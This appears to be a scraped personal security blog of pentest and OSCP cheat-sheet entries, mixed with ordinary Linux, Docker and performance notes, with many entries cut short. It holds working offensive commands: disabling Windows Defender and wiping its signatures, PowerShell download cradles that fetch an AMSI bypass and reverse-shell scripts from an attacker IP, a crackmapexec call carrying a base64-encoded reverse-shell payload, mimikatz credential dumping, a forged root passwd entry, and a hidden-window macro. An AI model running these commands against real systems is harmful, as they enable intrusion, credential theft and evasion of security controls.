Ceso Adventures

README !

Fri, 03 Oct 2025 00:00:00 +0000

Antivirus tend to flag malware by Signature/Heuristics detection, we could bypass these throughout certain techniques For more details, look up into the [Exploit Development/Reversing/AV|EDR Bypass](https://ceso.github.io/2020/12/hacking-resources/#exploit-developmentreversingAV|EDR Bypass) Section on the resources part of my blog.

If NOT AV Bypass and Admin, DISABLE Defender

If we have admin creds, we could disable Win Defender, please note THIS IS NEVER a good idea in production environments as this can be monitored!!

# Query if there is already an excluded path
 Get-MpPreference | select-object -ExpandProperty ExclusionPath
# Disable real time monitoring
 Set-MpPreference -DisableRealtimeMonitoring $true
# Exclude temp dir from monitoring by defender
 Add-MpPreference -ExclusionPath "C:\windows\temp"
# Disable Defender ONLY for downloaded files
 Set-MpPreference -DisableIOAVProtection $true
# Or REMOVE ALL Signature's but leave it enabled
 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

README !

Fri, 03 Oct 2025 00:00:00 +0000

It’s possible to do pivoting by using proxychains, pure nc’s or in case of linux just some fifo files (I will write them down this another methods down maybe in a future), I have used during all the OSCP an awesome tool called (sshuttle)[https://github.com/sshuttle/sshuttle] (it’s a transparent proxy server that works like “a vpn”, and doesn’t require with super rights, only thing needed is that the bastion server you will use, needs to have installed python) and sometimes some SSH Forwarding. Something worth to mention nmap doesn’t work through sshuttle.

Bash

Sat, 04 Oct 2025 00:00:00 +0000

xargs

ls | xargs -I {} mv {} 20080815-{}

String substitution:

STR=/path/to/foo.c

echo ${STR%/*} #=> "/path/to"
echo ${STR%.c} #=> "/path/to/foo"
echo ${STR%.c}.o #=> "/path/to/foo.o"
echo ${STR##*.} #=> "c" (extension)

BASE=${SRC##*/} #=> "foo.c" (basepath)
DIR=${SRC%$BASE} #=> "/path/to"
echo ${STR%/*} #=> "/path/to"

Varible Substitution

echo ${STR/hi/hello} # Replace first match
echo ${STR//hi/hello} # Replace all matches
echo ${STR/#hi/hello} # ^hi
echo ${STR/%hi/hello} # hi$

echo "${STR:0:3}" # .substr(0, 3) -- position, length
echo "${STR:-3:3}" # Negative position = from the right

echo ${#line} # Length of $line

[ -z "$CC" ] && CC=gcc # CC ||= "gcc" assignment
${CC:=gcc} # $CC || "gcc"

#Substring for first 5 characters:
${variable:0:5}

Regex

if [[ "A" =~ "." ]]

Numeric comparisons

if (( $a < $b ))

Numeric calculation

$((a + 200)) # $ is optional

Variable defaults

${FOO:-word} # Returns word
${FOO:+word} # Returns empty, or word if set
${FOO:=word} # Sets parameter to word, returns word
${FOO:?message} # Echoes message and exits

${FOO=word} # : is optional in all of the above

Random numbers

$((RANDOM%=200)) # Random number 0..200
set -o noclobber # Avoid overlay files (echo "hi" > foo)
set -o errexit # Used to exit upon error, avoiding cascading errors
set -o pipefail # Unveils hidden failures
set -o nounset # Exposes unset variables

References

http://wiki.bash-hackers.org/doku.php

CoreOS

Sat, 04 Oct 2025 00:00:00 +0000

Delete all images and all instances:

docker ps -a|awk '{print $1}'|grep -v CONTAINER|while read a;do docker rm -f $a;done
docker images|awk '{print $3}'|grep -v IMAGE|while read a;do docker rmi -f $a;done

Connect to VM

DOCKER_NAME=ace-app
PID=$(docker inspect --format '{{.State.Pid}}' $DOCKER_NAME)
sudo nsenter --target $PID --mount --uts --ipc --net --pid

Forward ports to internal

iptables -D PREROUTING -t nat -i enp0s8 -p tcp --dport 80 -j DNAT --to 10.1.0.56:80

Logs

journalctl --follow

systemd

systemctl start <process>
systemctl stop <process>
systemctl reload-daemon

Q: How do I change the current runlevel?

systemctl isolate runlevel5.target
systemctl isolate graphical.target

Q: How do I change the default runlevel to boot into?

ln -sf /usr/lib/systemd/system/multi-user.target /etc/systemd/system/default.target
ln -sf /usr/lib/systemd/system/graphical.target /etc/systemd/system/default.target

Docker functions

docker_connect () {
 DOCKER_NAME=$1
 PID=$(docker inspect --format '{{.State.Pid}}' $DOCKER_NAME)
 sudo nsenter --target $PID --mount --uts --ipc --net --pid
}

docker_nuke() {
 docker ps -q | xargs docker stop
 docker ps -q -a | xargs docker rm
}

docker_rmi_none() {
 docker images | grep '<none>' | \
 awk '{ print $3 }' | \
 xargs docker rmi
}

docker_go() {
 docker run --rm -t -i $@
}

docker_rm_stop() {
 (docker ps -q -a;docker ps -q) | \
 sort | \
 uniq -u | \
 xargs docker rm
}

etcd

curl -X GET http://localhost:5000/v1/search?q=postgresql
curl -s -X GET http://meerkat.dev.o2.co.uk:8080/v1/search|python -mjson.tool
curl -s -X GET http://meerkat.dev.o2.co.uk:8080/v1/repositories/jenkins-slave/tags|python -mjson.tool

General

Sat, 04 Oct 2025 00:00:00 +0000

User. Run command as different user with /bin/nologin

sudo -u user <command>
su -m user -c 'command'

Run Levels - get current runlevel

runlevel

Crontab

https://crontab.guru/

Filesystem

Filesystem tuning

tune2fs -c 0 /dev/hda1 => Set number of mounts between checks. 0 is disable

blkid /dev/hda1 => Get the filesystem id:
findfs UUID=d40acb36-5f32-4832-bf1a-80c67833a618 => reverse uuid lookup

ls -l /dev/disk/by-*/ => List by different types:

List filesystems suppported

cat /proc/filesystems

Kernel

Check shared memory

ipcs

Check current max and min

/proc/sys/kernel
sysctl -a

Change parameters

sysctl -p /etc/sysctl.conf

Flush Disk Cache

echo 3 | sudo tee /proc/sys/vm/drop_caches

See video in youtube

mplayer $(youtube-dl -g https://www.youtube.com/watch?v=hqtZnJg9TM0)

Create a socks proxy with ssh

ssh -v -D 4545 USER@WTF_DESKTOP

Local port forwarding: allows you connect from your local computer to another server

ssh -L 8080:www.ubuntuforums.org:80 host

Sssh without prompting

alias ssh='ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -q'

Change samba password

smbpasswd -r london.net-a-porter.com -U <username>

Hexdata to binary

xxd bdata | xxd -r >bdata2

RAW data recovery

foremost

Find latest files that changed in a dir and subdir

find . -type f|xargs ls -alrt

Creating patches

diff -Naur oldfile newfile > new-patch
diff <( ssh -nq lmn-prd-sendmailrelay001 cat /etc/mail/access ) <( ssh -qn prdlmn4912 cat /etc/mail/access )

Apply patches:

Performance

Sat, 04 Oct 2025 00:00:00 +0000

Diagrams

http://www.slideshare.net/slideshow/embed_code/16739605#

Load average across time. Load average can be impacted by IO

uptime

On TOP The process list does not show KERNEL threads

top
htop
atop
nmon => press c + m + d + n

Network graphical tools

iftop
nload

Multi processor statistics

mpstat -P ALL 1

DISK I/O Statistics, First output is summary since boot

iostat -xkdz 1A

Virtual Memory statistics. First line include some summaries since boot values

r= total number of runnable threads, including those running

vmstat 1

Memory usage summary

free

Simple network latency but from kernel to kernel, including stack

ping

Network statistics tools. Check Utilization and Saturation columns (last 2)

wget ftp://ftp.pbone.net/mirror/ftp5.gwdg.de/pub/opensuse/repositories/home:/cwx_holle/RedHat_RHEL-6/i686/nicstat-1.92-2.1.i686.rpm
yum install nicstat-1.92-2.1.i686.rpm
nicstat -z 1

System Activity reporter

sar 1
sar -B 1

Various network protocol statistics

netstat -s

who is consuming CPU

pidstat 1

Pidstat to identify which application is writing to disk. It includes kernel threads with -d

pidstat -d 1

System call tracer

strace -tttT -p PID
strace -s 2000 -f -p PID => With lsof you can tell what are the file descriptors

Get statistics for each system call excecuted, this is useful to compare a process that is working good vs a process that is not working right

(Simple) Buffer Overflow (32 bits, NO ASLR and NO DEP)

Fri, 03 Oct 2025 00:00:00 +0000

0 - Crash the application
1 - Fuzzing (find aprox number of bytes where the crash took place)
2 - Find offset
3 - EIP control
4 - Check for enough space on buffer
5 - Badchars counting
6 - Find return address (JMP ESP)
7 - Create payload

Fuzzing: example with vulnserver + spike on TRUN command

cat > trun.spk <<EOF
s_readline();
s_string("TRUN ");
s_string_variable("COMMAND");
EOF

Now, start wireshark filtering on the target IP/PORT below and run the trun.spk:

AMSI

Fri, 03 Oct 2025 00:00:00 +0000

AMSI (Anti-Malware Scan Interface), in short sit’s between Powershell and Defender, so even if our crafted malware/tools have an AV Bypass, it still can be flagged by AMSI (annoying!), AMSI can also be leveraged for example for EDR’s. There are certain ways to bypass AMSI, for example forcing it to fail.

BloodHound

Fri, 03 Oct 2025 00:00:00 +0000

$attacker="192.168.42.37";$domain="example.com";IEX(New-Object Net.Webclient).downloadString("http://$attacker/4msibyp455.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/SharpHound.ps1");Invoke-BloodHound -CollectionMethod All,GPOLocalGroup,LoggedOn -Domain $domain

Brute Force

Fri, 03 Oct 2025 00:00:00 +0000

https://github.com/Coalfire-Research/npk <—— Distributed hash-cracking platform on serverless AWS componentes
https://hashcat.net/wiki/doku.php?id=example_hashes
https://github.com/danielmiessler/SecLists
https://github.com/rapid7/ssh-badkeys
https://crackstation.net/

Buffer Overflows

Fri, 03 Oct 2025 00:00:00 +0000

Bug Bounty & Web Security

Fri, 03 Oct 2025 00:00:00 +0000

Cheatshees/Aricles/Podcasts

Fri, 03 Oct 2025 00:00:00 +0000

Chisel

Fri, 03 Oct 2025 00:00:00 +0000

If we have Chisel with remote port forward from machine in the net:

On attacker machine I start up a chisel reverse server on port 9050 (imagine this machine IP is 192.168.90.90)

server -p 9050 --reverse

On compromised machine in the network I start a client connection against the server running in the attacker. The command below will be forwarding the traffic from port 8081 in the machine 172.16.42.90 throughout the compromised machine (via localhost in port 5050) to the attacker.

Cloud

Fri, 03 Oct 2025 00:00:00 +0000

Compiling

Fri, 03 Oct 2025 00:00:00 +0000

Arch cross compile exploit (and diff glibc version)

gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c

Compiling

Fri, 03 Oct 2025 00:00:00 +0000

Exploitation

Fri, 03 Oct 2025 00:00:00 +0000

List all available credentials cached (Hashes and Passwords; Logged on user and computer)

mimikatz.exe "sekurlsa::logonpasswords" exit

Convert to ccache

We can use the tool ticket_converter written by zer1t0 for converting kirbi tickets to ccache and viceversa:

Convert from b64 encoded blob to kirbi:
 [IO.File]::WriteAllBytes("C:\fullpathtoticket.kirbi", [Convert]::FromBase64String("aa…"))
Convert the .kiribi to .ccache:
 python ticket_converter.py ticket.ccache ticket.kirbi
Copy the ccache to our attacker machine and export the KRB5CCNAME variable:
 export KRB5CCNAME=/path/to/ticket.ccache

GenericAll

_TODO

FTP

Fri, 03 Oct 2025 00:00:00 +0000

If there is an ftp server which we have access, we can upload files there through it, the "" is the same for both, windows or linux:

Connect and login with:

ftp 192.168.42.42

Upload the files with:

put evil.py

Sometimes is needed to enter in passive mode before doing anything, if is the case, just type:

pass

followed by enter

General

Fri, 03 Oct 2025 00:00:00 +0000

General Hacking/CTF

Kubernetes

https://github.com/madhuakula/kubernetes-goat

Web

General

Fri, 03 Oct 2025 00:00:00 +0000

https://3xpl01tc0d3r.blogspot.com/2021/07/resource-based-constrained-delegation.html?m=1 <– Resource Based Constrained Delegation IN LINUX
https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks
https://www.ired.team/
https://www.harmj0y.net/blog/ **<—— Awesome Active Directory Posts **
https://malicious.link/post/2016/kerberoast-pt1/ <—— Serie about Kerberoasting (5 posts)
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/ <– Abuse Constrained Delegation
https://twitter.com/cube0x0/status/1468860246307258370?s=21
https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet

HTTP

Fri, 03 Oct 2025 00:00:00 +0000

From your local attacker machine, create a http server with:

sudo python3 -m http.server 80
sudo python2 -m SimpleHTTPServer 80

It’s also possible to specify which path to share, for example:

sudo python3 -m http.server 80 --dir /home/kali/tools

Windows

iex(new-object net.webclient).downloadstring("http://192.168.42.42/evil.ps1)
IWR -Uri "http://192.168.42.42/n64.exe" -Outfile "n64.exe"
certutil.exe -urlcache -split -f "http://192.168.42.42/nc.exe" nc.exe
wmic process get brief /format:"http://192.168.42.42/evilexcel.xsl
bitsadmin /Transfer myDownload http://192.168.42.42/evilfile.txt C:\Windows\Temp\evilfile.txt

Linux

curl http://192.168.42.42/evil.php --output evil.php

Linux

Fri, 03 Oct 2025 00:00:00 +0000

/home/user/openssl =ep (empty capabilities)

Make 2 copies of passwd, one as backup of the original, and one that will be used as custom:

cp /etc/passwd /tmp/passwd.orig
cp /etc/passwd /tmp/passwd.custom

Now, a custom user will be created and added to /tmp/passwd.custom with customPassword and as root user (UID = GID = 0):

echo 'ceso:'"$( openssl passwd -6 -salt xyz customPassword )"':0:0::/tmp:/bin/bash' >> /tmp/passwd.custom

Now, create a custom key.pem and cert.pem with openssl:

Linux

Fri, 03 Oct 2025 00:00:00 +0000

https://www.amazon.com/How-Linux-Works-2nd-Superuser/dp/1593275676/

Linux

Fri, 03 Oct 2025 00:00:00 +0000

General

Networking

Privilege Escalation

Login through CIFS/WinRM/PSSession

Fri, 03 Oct 2025 00:00:00 +0000

When injecting a ticket and impersonating a user, we can swap CIFS for HTTP for getting a shell via WinRM or swap CIFS for HOST for getting a shell via PsExec!!!

CrackMapExec - WinRM

With Hash

crackmapexec winrm 172.16.80.24 -u administrator -H 09238831b1af5edab93c773f56409d96 -x "ipconfig"

With Password (Example gets a reverse shell)

crackmapexec winrm 172.16.80.24 -u brie -p fn89hudi1892r -x "powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgAxADAANwAvAG4AaQBlAHIAaQAuAHAAcwAxACIAKQA7AEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANAA5AC4AMQAwADcALwByAHUAbgAtAHMAaABlAGwAbABjAG8AZABlAC0ANgA0AGIAaQB0AHMALgBwAHMAMQAiACkACgA="

CrackMapExec - SMB

With Hash

crackmapexec smb 172.16.21.22 -u gouda -H 09238831b1af5edab93c773f56409d96 -x "powershell.exe IEX(New-Object Net.Webclient).downloadString('http://192.168.42.42/4msibyp455.ps1');IEX(New-Object Net.Webclient).downloadString('http://192.168.42.42/dameelreversooo.ps1')"

With Hash + Domain

Metasploit

Fri, 03 Oct 2025 00:00:00 +0000

We use metasploit: autorute + socks_proxy

use post/multi/manage/autoroute
set session 8
run
use auxiliary/server/socks_proxy
run -j

The SRVPORT of socks_proxy must match the one configured in proxychains.conf as the VERSION used as well.

Misc

Fri, 03 Oct 2025 00:00:00 +0000

Enable execution of PowerShell Scripts

Set-ExecutionPolicy RemoteSigned
Set-ExecutionPolicy Unrestricted
powershell.exe -exec bypass

Encode Powershell b64 from Linux

echo 'ImAnEviCradleBuuhhhh' | iconv -t UTF-16LE | base64 -w0

Encode/Decode b64 in Windows WITHOUT Powershell

certutil -encode <inputfile> <outputfile>
certutil -decode <b64inputfile> <plainoutputdecodedfile>
 ^-- If the file exists I can use the -f flag which will force an overwrite

Set Proxy in code used (Windows)

Powershell

[System.Net.WebRequest]::DefaultWebProxy.GetProxy(url)

JScript

var url = "http://192.168.42.43/reverse.exe";
var var Object = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
Object.setProxy("2","192.168.42.42:3128");
Object.open('GET', url, false);
Object.send();
 ^-- This was tricky because lack of debug information. The parameter in "2" means "SXH_PROXY_SET_PROXY", and it allows to specify a list of one or more servers together with a bypass list. The .open() must be in lowercase otherwise .Open() is another method

Hide Foreground with WMI (Windows, Office Macros)

Sub example()
 Const HIDDEN_WINDOW = 0
 Dim cmd As String

 cmd = "Here there is some commands to execute inside the macro via WMI"
 Set objWMIService = GetObject("winmgmts:")
 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
 Set objConfig = objStartup.SpawnInstance_
 objConfig.ShowWindow = HIDDEN_WINDOW
 Set objProcess = GetObject("winmgmts:Win32_Process")
 errReturn = objProcess.Create(str, Null, objConfig, pid)
End Sub

Mobile

Fri, 03 Oct 2025 00:00:00 +0000

Networking

Fri, 03 Oct 2025 00:00:00 +0000

nmap

I tend to run 3 nmaps, an initial one, a full one and an UDP one, all of them in parallel:

nmap -sV -O --top-ports 50 --open -oA nmap/initial <ip or cidr>
nmap -sC -sV -O --open -p- -oA nmap/full <ip or cidr>
nmap -sU -p- -oA nmap/udp <ip or cidr>

--top-ports only scan the N most common ports
--open only show open ports
-sC use the default scripts
-sV detect versions
-O detect Operating Systems
-p- scan all the ports
-oA save the output in normal format, grepable and xml
-sU scan UDP ports

Is also possible to specify scripts or ports:

Obfuscators

Fri, 03 Oct 2025 00:00:00 +0000

Obfuscators

Fri, 03 Oct 2025 00:00:00 +0000

Permissions: ACE/SDDL - Format

Fri, 03 Oct 2025 00:00:00 +0000

ACE (Access Control Enties)
SDDL (Security Descriptor Definition Language)

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

--> ace_type: defines allow/deny/audit
--> ace_flags: inheritance objects
--> rights: incremental list with given permissions (allowed/audited/denied), incrmentalas ARE NOT the only ones
--> object_guid and inherit_object: Allows to apply an ACE on a specified objects by GUID values. GUID is an object class, attribute, set or extended right, if pressent limits the ACE's to the object the GUID represents. Inherited GUID represents an object class, if present will limit the inheritance of ACE's to the child enties only of that object
--> account_sid: SID of the object the ACE is applying, is the SID of the user or group to the one permissions are being assigned, sometimes there are acronyms of well known SID's instead of numerical ones

Pivoting

Fri, 03 Oct 2025 00:00:00 +0000

PowerView - methods for enumeration

Fri, 03 Oct 2025 00:00:00 +0000

This is the command for download injected into memory with an AMSI Bypass before

$user="userNameHereIfQueryUsesIt";$attacker="192.168.49.107";$dominio="example.com";IEX(New-Object Net.Webclient).downloadString("http://$attacker/nieri.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/PowerView.ps1");OneOfThePowerViewCmdsFromBelowHere

ACLs

Get-ObjectAcl -Identity ceso <-- Get all the objects and acls the given user has

Users

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | ForEach-Object {$_ | Add-Member -NoteProperty Name Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ForEach-Object {if ( $_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Maps all users in the domain into a table replacing the SID for the name

Get-DomainUser -Domain example.com <-- Enumeration truncated only to the users in the given domain

Get-DomainUser -TrustedToAut <-- List all the SPN's which have Constrained Delegation

Groups

Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | ForEach-Object {$_ | Add-Member -NoteP ropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ForEach-Objec t {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Maps all groups in the domain into a table replacing the SID for the name

Get-DomainGroup -Domain example.com <-- Enumeration truncated only to the users in the given domain

Get-DomainGroupMember "Enterprise Admins" -Domain example.com <-- Get ALL the members of the group "Enterprise Admins" inside the example.com domain

Get-DomainForeignGroupMember -Domain example2.com <-- Enumerate groups in a trusted forest or domain which contains NON-NATIVE members

Computers

Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identit y -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Enumerate computers accounts in the domain

Get-DomainComputer -Unconstrained <-- Enumerate unconstrained computers

Get-DomainComputer -Identity cesoComputer <-- Verify that cesoComputer exists

Trusts

Get-DomainTrust <-- Enumerate trusts by making an LDAP query, this works by the DC creating a Trusted Domain Object (TDO)

Get-DomainTrust -API <-- Enumerate trusts by using Win32 API DsEnumerateDomainTrusts
 ^-- If I add the -domain flag, it will enumerate all the found in the domain

Get-DomainTrustMapping <-- Automate the process of enumeration for all forest trust and their child domains trust

SID’s

Get-DomainSID <-- Get the SID of the current domain
Get-DomainSID -Domain example.com <-- Get the SID of example.com

Presentations/Videos

Fri, 03 Oct 2025 00:00:00 +0000

Defeating EDRs using Dynamic Invocation - Jean Francois Maes https://youtu.be/LXfhyTpQ7TM
A New Era Of SSRF: Exploiting Url Parsrs - Orange Tsai https://www.youtube.com/watch?v=D1S-G8rJrEk
HTTP Desync Attacks: Smashing into the Cell Next Door - albinowax https://www.youtube.com/watch?v=w-eJM2Pc0KI&t=1622s
A $7.500 BUG BOUNTY Bug Explained, step by step. (Blind XXE OOB over DNS) - STOK https://www.youtube.com/watch?v=aSiIHKeN3ys&t=26s&pbjreload=101
GitHub Recon and Sensitive Data Exposure https://youtu.be/l0YsEk_59fQ
Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface https://www.youtube.com/watch?v=zP4b3pw94s0
How to Crush Bug Bounties in the first 12 Months https://www.youtube.com/watch?v=AbebbJ3cRLI
The Bug Hunter’s Methodology v4.0 - Recon Edition by @jhaddix at #NahamCon2020 https://youtu.be/p4JgIu1mceI
How i became a HackerOne MVH without writing a single line of python (Motivational talk) by STOK https://youtu.be/4YjCta2fcbw
My Journey to Cybersecurity CIA Keynote - Heath Adams (aka The Cyber Mentor) https://www.youtube.com/watch?v=q4h8A5dQsZw
Defeating EDR’s using D/Invoke - Jean-François Maes - https://youtu.be/d_Z_WV9fp9Q

RDP

Fri, 03 Oct 2025 00:00:00 +0000

If we have access to a windows machine with a valid user/credentials and this user is in the “Remote Desktop Users”, we can share a local directorie as a mount volume through rdp itself once we connect to the machine:

Linux

Mounting Volume

rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries 192.168.30.30 -u pelota -p -

Forcing enable of clipboard

I might want to force the use of the clipboard if it’s not being taken by default and use the 100% of the screen:

Reconnaissance

Fri, 03 Oct 2025 00:00:00 +0000

General

https://github.com/bee-san/pyWhat

Subdomains

Finders

https://github.com/projectdiscovery/subfinder
https://github.com/guelfoweb/knock
https://crt.sh/
https://shodan.io/
https://securitytrails.com/
https://github.com/OWASP/Amass
https://www.crunchbase.com/search/acquisitions **<—— Discovering searching by acquisitions **
https://censys.io/
https://dnsdumpster.com/
https://mxtoolbox.com/

Takeover

By ASNs & Whois

Reversing/AV|EDR Bypass/Malware Analysis

Fri, 03 Oct 2025 00:00:00 +0000

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://amsi.fail/ <—- Automatic generation of some AMSI Bypass
https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
https://ppn.snovvcrash.rocks/red-team/malware-development/code-injection/shellcode-runners
https://samsclass.info/126/126_F21.shtml <— Practical Malware Analysis Course!
https://www.ringzerolabs.com/2019/08/fast-and-free-malware-analysis-lab-setup.html
https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-development-review/
https://github.com/m0n0ph1/Process-Hollowing
https://www.virusbulletin.com/virusbulletin/2011/10/okay-so-you-are-win32-emulator
https://www.usenix.org/system/files/conference/woot16/woot16-paper-blackthorne_update.pdf
https://blog.sannemaasakkers.com/2021/08/07/adversary-phishing-characteristics/
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://roberreigada.github.io/posts/playing_with_an_edr/
https://github.com/jthuraisamy/SysWhispers
https://raw.githubusercontent.com/Mr-Un1k0d3r/EDRs/main/cortex.txt <—– NON documented API’s, possible AV/EDR Bypass?
https://0xpat.github.io/Malware_development_part_1/ <—- Malware Devlopment series
https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation
https://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html
https://n4r1b.netlify.app/posts/2020/01/dissecting-the-windows-defender-driver-wdfilter-part-1/
https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing
https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection <— APC Bypass
https://pinvoke.net/ <—— Documented APIs for Bypass
https://antiscan.me/
https://github.com/stephenfewer/ReflectiveDLLInjection –> ReflectiveDLLInjection en Powershell!!!!
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 –> Invoke-ReflectivePEInjection Powershell
https://blogs.msdn.microsoft.com/joelpob/2004/02/15/creating-delegate-types-via-reflection-emit/
https://web.archive.org/web/20120520182849/http://www.exploit-monday.com/2012_05_13_archive.html

Samba

Fri, 03 Oct 2025 00:00:00 +0000

smbclient

Check if there is anonymous login enabled:

smbclient -L 192.168.24.24

impacket

Is also possible to use impacket in the same way than smbclient to check for anonymous login (and a lot more as browse the shares) in case of incompatible versions.


/usr/share/doc/python3-impacket/examples/smbclient.py ""@192.168.24.24

smbmap

Check which permissions we have in those shares (if there are):

smbmap -H 192.168.24.24
Or having an user:
smbmap -u ceso -H 192.168.24.24

Samba

Fri, 03 Oct 2025 00:00:00 +0000

Mount in Windows

Mounting it in Windows with Powershell:

New-PSDrive -Name "tools" -PSProvider "Filesystem" -Root "\\192.168.42.42\tools"

Mounting it without Powershell:

net use z: \\192.168.42.42\tools"

On windows, to list mounted shares, either Powershell or without it:

Powershell: Get-SMBShare
Without Powershell: net share

Mount in Linux

Is needed to have installed cifs-utils, to install it (in debian based):

sudo apt-get install cifs-utils

To mount it:

sudo mount -t cifs //192.168.42.42/tools ~/my_share/

To list mounted shares:

Screenshooting

Fri, 03 Oct 2025 00:00:00 +0000

Signature/Heuristics

Fri, 03 Oct 2025 00:00:00 +0000

Signature Bypass

For example, we can obfuscate the code ciphering and/or encoding (having a decipher/decoding routine in the code), as also leverage tools dedicated for this purpose. Another thing is to use NOT common name for functions, variable names, etc; lunfardos, slang, idioisms, weird words from the dictionary, etc.

Heuristics Bypass

As for the heuristics for example AV’s tend to execute the malware inside a sandbox, we could have code for detecting if running inside a sandbox and exit if this is true. I could use the following techniques:

Sockets

Fri, 03 Oct 2025 00:00:00 +0000

Using nc/ncat is possible to create as a listener to upload/download stuff through them, the syntax for nc and ncat is basically the same. Create the socket with:

Attacker:
 nc -lvnp 443 < evil.php

For both cases from windows, the only difference is to write nc.exe

Victim:
 nc -v 192.168.42.42 443 > evil.php

sshuttle

Fri, 03 Oct 2025 00:00:00 +0000

One hop

Let’s say we are in an intranet and we have compromised a firewall that gives us access to the management net (fw.example.mgmt - ips 192.168.20.35 and 192.168.30.253 as the management ip), by using sshuttle we can create a “vpn” to talk directly to those servers, for that, we use:

sshuttle ceso@192.168.20.35 192.168.30.0/24

Multi-hops

Now imagine that after we broke up into the management net after some some enumeration, we ended to compromise a machine that has also access to a production environment (foreman.example.mgmt - ips 192.168.30.40 and 192.168.25.87), we can take advantage of sshuttle + ProxyCommand of ssh to create a “vpn” through this multiple hops, so…putting it down, this will be kind of as follow (the diagram is extremly simplified and just for the sake of illustrate this visually, so it doesn’t intend to provide a 100% precise network diagram):

Twitter Accounts

Fri, 03 Oct 2025 00:00:00 +0000

securibee: https://twitter.com/securibee
codingo_: https://twitter.com/codingo_
hakluke: https://twitter.com/hakluke
JackRhysider: https://twitter.com/JackRhysider
Orange Tsai: https://twitter.com/orange_8361
MalwareTech: https://twitter.com/MalwareTechBlog
TomTomNom: https://twitter.com/TomNomNom
Jason Haddix: https://twitter.com/Jhaddix
NahamSec: https://twitter.com/NahamSec
STOK: https://twitter.com/stokfredrik
John Hammond: https://twitter.com/_johnhammond
Jake Williams: https://twitter.com/MalwareJake
Deviant Ollman: https://twitter.com/deviantollam
J3rryBl4nks: https://twitter.com/JBl4nks
Tib3rius: https://twitter.com/0xTib3rius
TheColonial: https://twitter.com/TheColonial
Rob Fuller: https://twitter.com/mubix
g0tmi1k: https://twitter.com/g0tmi1k
TJ_Null: https://twitter.com/TJ_Null
Rasta Mouse: https://twitter.com/_RastaMouse
ippsec: https://twitter.com/ippsec
Chema Alonso: https://twitter.com/chemaalonso
FalconSpy: https://twitter.com/0xFalconSpy
Minh: https://twitter.com/WhiteHoodHacker
0verfl0w: https://twitter.com/0verfl0w_
Markus Höfer: https://twitter.com/HashtagMarkus
Jonas L: https://twitter.com/jonasLyk
Will Dormann: https://twitter.com/wdormann
Scott Piper: https://twitter.com/0xdabbad00

Useful Wordlists

Fri, 03 Oct 2025 00:00:00 +0000

Most usefull dictionaries (OSCP/HTB)

/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/wfuzz/others/common_pass.txt

In seclists-pkg

/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
/usr/share/seclists/Passwords/Leaked-Databases/alleged-gmail-passwords.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Assetnote

Up-to-date lists are in the general webpage and there are many more than the ones here listed

https://wordlists.assetnote.io/

Ideally, all of them can be downloaded just at once running

wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH -e robots=off

API Fuzzing

https://wordlists-cdn.assetnote.io/data/automated/httparchive_apiroutes_2025_09_27.txt

Kiterunner

https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz
https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar
https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt

Local File Inclusion (LFI)

Linux

/proc/self/status
